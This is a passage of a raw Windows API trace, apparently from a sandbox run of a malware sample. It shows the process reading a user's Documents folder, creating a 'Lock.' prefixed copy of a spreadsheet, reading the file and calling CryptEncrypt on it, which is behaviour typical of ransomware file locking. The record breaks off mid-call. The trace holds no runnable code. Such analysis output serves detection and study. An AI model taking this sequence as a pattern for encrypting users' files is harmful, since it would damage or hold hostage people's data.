lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0265.585] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e775c8 | out: hHeap=0x970000) returned 1 [0265.585] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0265.585] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d48 [0265.585] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51610 [0265.585] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51760 [0265.585] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d88 [0265.585] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51700 [0265.585] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0265.585] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516d0 [0265.585] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d88 [0265.585] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0265.586] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51730 [0265.586] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0265.586] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x70) returned 0x2e565e8 [0265.586] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51730 | out: hHeap=0x970000) returned 1 [0265.586] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Documents/" (normalized: "c:\\users\\fd1hvy\\documents")) returned 0x11 [0265.586] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e565e8 | out: hHeap=0x970000) returned 1 [0265.586] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0265.586] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e775c8 [0265.586] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10000) returned 0x3be08a8 [0265.586] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51730 [0265.586] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0265.586] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents/Lock.lC9iCEh8edFMc0F.xlsx" (normalized: "c:\\users\\fd1hvy\\documents\\lock.lc9iceh8edfmc0f.xlsx"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2d0 [0265.587] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69be8 [0265.587] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51700 | out: hHeap=0x970000) returned 1 [0265.587] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51760 | out: hHeap=0x970000) returned 1 [0265.587] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516d0 | out: hHeap=0x970000) returned 1 [0265.587] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51610 | out: hHeap=0x970000) returned 1 [0265.587] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0265.587] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51778 | out: hHeap=0x970000) returned 1 [0265.587] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0265.587] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51880 | out: hHeap=0x970000) returned 1 [0265.587] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0265.587] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d48 [0265.587] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0265.587] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77888 [0265.588] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0265.588] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77888 | out: hHeap=0x970000) returned 1 [0265.588] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0265.588] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a08 [0265.588] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0265.588] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d48 [0265.588] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516d0 [0265.588] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51610 [0265.588] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0265.588] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0265.588] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51880 [0265.588] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0265.588] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55108 [0265.588] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69c28 [0265.588] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69c28 | out: hHeap=0x970000) returned 1 [0265.588] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0265.588] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0265.588] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51700 [0265.588] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51748 [0265.588] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0265.591] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x100000) returned 0x125a020 [0265.594] SetFilePointerEx (in: hFile=0x2a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf4e4 | out: lpNewFilePointer=0x0) returned 1 [0265.594] ReadFile (in: hFile=0x2a0, lpBuffer=0x2f04008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2f04008*, lpNumberOfBytesRead=0x8cf4f8*=0x9adc, lpOverlapped=0x0) returned 1 [0265.597] ReadFile (in: hFile=0x2a0, lpBuffer=0x2f04008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2f04008*, lpNumberOfBytesRead=0x8cf4f8*=0x0, lpOverlapped=0x0) returned 1 [0265.597] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51748 | out: hHeap=0x970000) returned 1 [0265.597] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0265.597] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51700 | out: hHeap=0x970000) returned 1 [0265.597] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0265.597] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x9adc) returned 0x2f16018 [0265.597] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x125a020 | out: hHeap=0x970000) returned 1 [0265.600] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51610 | out: hHeap=0x970000) returned 1 [0265.600] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51880 | out: hHeap=0x970000) returned 1 [0265.600] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516d0 | out: hHeap=0x970000) returned 1 [0265.600] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0265.600] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517c0 | out: hHeap=0x970000) returned 1 [0265.600] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0265.600] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51628 | out: hHeap=0x970000) returned 1 [0265.600] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f78 [0265.600] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x9adc) returned 0x2f1fb00 [0265.600] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f16018 | out: hHeap=0x970000) returned 1 [0265.600] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0265.600] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0265.600] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d48 [0265.600] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516d0 [0265.600] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51700 [0265.600] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0265.600] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fc8 [0265.600] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x9adc) returned 0x2f16018 [0265.600] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0265.600] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f16018 | out: hHeap=0x970000) returned 1 [0265.600] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0265.600] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51700 | out: hHeap=0x970000) returned 1 [0265.600] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516d0 | out: hHeap=0x970000) returned 1 [0265.600] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0265.601] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0265.601] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d48 [0265.601] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0265.601] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69ac8 [0265.601] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ac8 | out: hHeap=0x970000) returned 1 [0265.601] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0265.601] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0265.601] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77908 [0265.601] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0265.601] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d48 [0265.601] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55d50 [0265.601] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0265.601] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0265.601] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55d50 | out: hHeap=0x970000) returned 1 [0265.601] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0265.601] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51760 [0265.601] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54da8 [0265.601] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51880 [0265.601] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51610 [0265.601] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fb8 [0265.601] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550c8 [0265.601] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x9adc) returned 0x2f16018 [0265.601] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0265.602] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54fd8 [0265.602] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51628 [0265.602] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550d8 [0265.602] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0265.602] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54f38 [0265.602] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517c0 [0265.602] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f58 [0265.602] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0265.602] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54f48 [0265.602] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516d0 [0265.602] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550d8 [0265.602] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0265.602] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51700 [0265.602] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54378 [0265.602] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51748 [0265.602] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55078 [0265.602] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51778 [0265.602] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55068 [0265.602] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x9adc) returned 0x2f295e8 [0265.603] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540a8 [0265.603] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b08 [0265.603] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f88 [0265.603] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b08 | out: hHeap=0x970000) returned 1 [0265.603] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540d0 [0265.603] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a48 [0265.603] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540f8 [0265.603] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b38 [0265.603] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f98 [0265.603] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a90 [0265.603] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54288 [0265.603] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ad8 [0265.603] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55088 [0265.603] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51aa8 [0265.603] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0265.603] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0265.603] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b68 [0265.603] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55098 [0265.603] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a78 [0265.603] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bb0 [0265.604] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ff8 [0265.604] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54120 [0265.604] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b08 [0265.604] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55028 [0265.604] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a60 [0265.604] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518e0 [0265.604] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b68 | out: hHeap=0x970000) returned 1 [0265.604] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0265.604] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a78 | out: hHeap=0x970000) returned 1 [0265.604] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0265.604] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51910 [0265.604] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fa8 [0265.604] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a78 [0265.604] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518c8 [0265.604] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0265.605] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0265.605] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0265.605] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0265.605] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0265.605] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54440 | out: hHeap=0x970000) returned 1 [0265.605] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0265.605] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0265.605] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0265.605] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55ca8 | out: hHeap=0x970000) returned 1 [0265.605] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0265.605] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0265.605] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0265.606] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77888 | out: hHeap=0x970000) returned 1 [0265.606] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0265.606] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0265.606] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55d50 | out: hHeap=0x970000) returned 1 [0265.606] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0265.606] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0265.606] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0265.606] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78c00 | out: hHeap=0x970000) returned 1 [0265.606] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518f8 | out: hHeap=0x970000) returned 1 [0265.606] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0265.606] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0265.606] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0265.607] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0265.607] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a48 | out: hHeap=0x970000) returned 1 [0265.607] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0265.607] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0265.607] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55ca8 | out: hHeap=0x970000) returned 1 [0265.607] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0265.607] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0265.608] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0265.608] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0265.608] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2e51e08, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0265.608] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e08 | out: hHeap=0x970000) returned 1 [0265.608] GetProcAddress (hModule=0x756e0000, lpProcName="CryptEncrypt") returned 0x75712cf0 [0265.608] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51df0 | out: hHeap=0x970000) returned 1 [0265.608] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e552b8 | out: hHeap=0x970000) returned 1 [0265.608] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1c) returned 0x2e544e0 [0265.608] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e551d8 [0265.608] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e551a8 [0265.608] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e552c8 [0265.609] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e552e8 [0265.609] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e551c8 [0265.609] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55148 [0265.609] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e552b8 [0265.609] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e551d8 | out: hHeap=0x970000) returned 1 [0265.609] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e551a8 | out: hHeap=0x970000) returned 1 [0265.609] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e552c8 | out: hHeap=0x970000) returned 1 [0265.609] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e552e8 | out: hHeap=0x970000) returned 1 [0265.609] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e551c8 | out: hHeap=0x970000) returned 1 [0265.609] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55148 | out: hHeap=0x970000) returned 1 [0265.609] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e552b8 | out: hHeap=0x970000) returned 1 [0265.609] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e544e0 | out: hHeap=0x970000) returned 1 [0265.609] CryptEncrypt (in: hKey=0xa87090, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x8cef60*=0x9adc, dwBufLen=0x0 | out: 